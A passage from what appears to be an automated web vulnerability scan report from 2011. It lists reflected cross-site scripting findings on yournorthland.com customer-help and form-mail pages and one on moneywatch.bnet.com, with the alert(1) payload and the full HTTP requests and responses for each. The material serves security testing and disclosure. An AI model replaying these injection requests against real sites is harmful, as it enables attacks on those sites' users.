"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=21485"><script>alert(1)</script>9807c2c50b7&office=&rtCtr=">
...[SNIP]...

3.809. http://yournorthland.com/custHelp/paymentoptions.asp [atype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/paymentoptions.asp

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d009b"><script>alert(1)</script>cb0bc154024 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/paymentoptions.asp?atype=d009b"><script>alert(1)</script>cb0bc154024&area=&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10916
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=d009b"><script>alert(1)</script>cb0bc154024&area=&office=&rtCtr=">
...[SNIP]...

3.810. http://yournorthland.com/custHelp/paymentoptions.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/paymentoptions.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a23a"><script>alert(1)</script>4d044f2703f was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/paymentoptions.asp?atype=&area=&office=9a23a"><script>alert(1)</script>4d044f2703f&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10916
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=9a23a"><script>alert(1)</script>4d044f2703f&rtCtr=">
...[SNIP]...

3.811. http://yournorthland.com/custHelp/paymentoptions.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/paymentoptions.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983f2"><script>alert(1)</script>78510f0137c was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/paymentoptions.asp?atype=&area=&office=&rtCtr=983f2"><script>alert(1)</script>78510f0137c HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10916
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=983f2"><script>alert(1)</script>78510f0137c">
...[SNIP]...

3.812. http://yournorthland.com/custHelp/phoneHelp.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/phoneHelp.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86762"><script>alert(1)</script>9e5af0f4baf was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/phoneHelp.asp?atype=&area=86762"><script>alert(1)</script>9e5af0f4baf&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24997
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=86762"><script>alert(1)</script>9e5af0f4baf&office=&rtCtr=">
...[SNIP]...

3.813. http://yournorthland.com/custHelp/phoneHelp.asp [atype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/phoneHelp.asp

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 798e1"><script>alert(1)</script>288a768466d was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/phoneHelp.asp?atype=798e1"><script>alert(1)</script>288a768466d&area=&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24997
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=798e1"><script>alert(1)</script>288a768466d&area=&office=&rtCtr=">
...[SNIP]...

3.814. http://yournorthland.com/custHelp/phoneHelp.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/phoneHelp.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83b89"><script>alert(1)</script>5b387fd0ff8 was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/phoneHelp.asp?atype=&area=&office=83b89"><script>alert(1)</script>5b387fd0ff8&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24997
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=83b89"><script>alert(1)</script>5b387fd0ff8&rtCtr=">
...[SNIP]...

3.815. http://yournorthland.com/custHelp/phoneHelp.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/phoneHelp.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e966"><script>alert(1)</script>c7213ac2713 was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/phoneHelp.asp?atype=&area=&office=&rtCtr=3e966"><script>alert(1)</script>c7213ac2713 HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24997
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=3e966"><script>alert(1)</script>c7213ac2713">
...[SNIP]...

3.816. http://yournorthland.com/custhelp/default.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custhelp/default.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 541c0"><script>alert(1)</script>36fade05f9a was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custhelp/default.asp??atype=&area=541c0"><script>alert(1)</script>36fade05f9a&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9019
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=541c0"><script>alert(1)</script>36fade05f9a&office=&rtCtr=">
...[SNIP]...

3.817. http://yournorthland.com/custhelp/default.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custhelp/default.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7703e"><script>alert(1)</script>ffd15f3598c was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custhelp/default.asp??atype=&area=&office=7703e"><script>alert(1)</script>ffd15f3598c&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9019
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=7703e"><script>alert(1)</script>ffd15f3598c&rtCtr=">
...[SNIP]...

3.818. http://yournorthland.com/custhelp/default.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custhelp/default.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fa7"><script>alert(1)</script>4571b93377b was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custhelp/default.asp??atype=&area=&office=&rtCtr=77fa7"><script>alert(1)</script>4571b93377b HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9019
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=77fa7"><script>alert(1)</script>4571b93377b">
...[SNIP]...

3.819. http://yournorthland.com/scripts/formmail.asp [Email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/scripts/formmail.asp

Issue detail

The value of the Email request parameter is copied into the HTML document as plain text between tags. The payload 45a0c<script>alert(1)</script>d4a5554d689 was submitted in the Email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /scripts/formmail.asp?formSubject=Order%20Now%20Form HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
Referer: http://yournorthland.com/ordernow.asp
Cache-Control: max-age=0
Origin: http://yournorthland.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.9.10.1303935242
Content-Length: 468

_recipients=no-reply-99%40yournorthland.com&_requiredFields=Name%2CEmail%2CAddress%2CCity%2CPhone+Number&url=%2F&system=&Name=&Account=&Address=&City=&Phone+Number=&Source=99&Cable=none&premium=&Internet=none&Phone=none&Email=45a0c<script>alert(1)</script>d4a5554d689&_replyToField=Email&_replyto=Email&Comments=&_envars=HTTP_REFERER%2C+HTTP_USER_AGENT%2CREMOTE_ADDR&_fieldOrder=Name%2C+Account%2C+Address%2C+City%2C+Phone+Number%2C+Cable%2C+Premium%2C+Internet%2C+Ph
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1338
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:33:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<li class="error">Invalid email address in reply-to field: 45a0c<script>alert(1)</script>d4a5554d689.</li>
...[SNIP]...

3.820. http://yournorthland.com/scripts/formmail.asp [_recipients parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/scripts/formmail.asp

Issue detail

The value of the _recipients request parameter is copied into the HTML document as plain text between tags. The payload cb246<script>alert(1)</script>31efc74bc28 was submitted in the _recipients parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /scripts/formmail.asp?formSubject=Order%20Now%20Form HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
Referer: http://yournorthland.com/ordernow.asp
Cache-Control: max-age=0
Origin: http://yournorthland.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.9.10.1303935242
Content-Length: 468

_recipients=no-reply-99%40yournorthland.comcb246<script>alert(1)</script>31efc74bc28&_requiredFields=Name%2CEmail%2CAddress%2CCity%2CPhone+Number&url=%2F&system=&Name=&Account=&Address=&City=&Phone+Number=&Source=99&Cable=none&premium=&Internet=none&Phone=none&Email=&_replyToField=Em
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1419
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<li class="error">Invalid email address in recipient list: no-reply-99@yournorthland.comcb246<script>alert(1)</script>31efc74bc28.</li>
...[SNIP]...

3.821. http://yournorthland.com/scripts/formmail.asp [_requiredFields parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/scripts/formmail.asp

Issue detail

The value of the _requiredFields request parameter is copied into the HTML document as plain text between tags. The payload 9d19b<script>alert(1)</script>676488ddeb4 was submitted in the _requiredFields parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /scripts/formmail.asp?formSubject=Order%20Now%20Form HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
Referer: http://yournorthland.com/ordernow.asp
Cache-Control: max-age=0
Origin: http://yournorthland.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.9.10.1303935242
Content-Length: 468

_recipients=no-reply-99%40yournorthland.com&_requiredFields=Name%2CEmail%2CAddress%2CCity%2CPhone+Number9d19b<script>alert(1)</script>676488ddeb4&url=%2F&system=&Name=&Account=&Address=&City=&Phone+Number=&Source=99&Cable=none&premium=&Internet=none&Phone=none&Email=&_replyToField=Email&_replyto=Email&Comments=&_envars=HTTP_REFERER%2C+HTTP_USE
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1319
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<li class="error">Missing value for Phone Number9d19b<script>alert(1)</script>676488ddeb4</li>
...[SNIP]...

3.822. http://moneywatch.bnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://moneywatch.bnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e021"><a>106e1ea1801 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /?tag=hdr;cnav HTTP/1.1
Host: moneywatch.bnet.com
Proxy-Connection: keep-alive
Referer: 2e021"><a>106e1ea1801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:22:54 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Thu, 26-Apr-2012 23:22:54 GMT; path=/; domain=.bnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 77566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
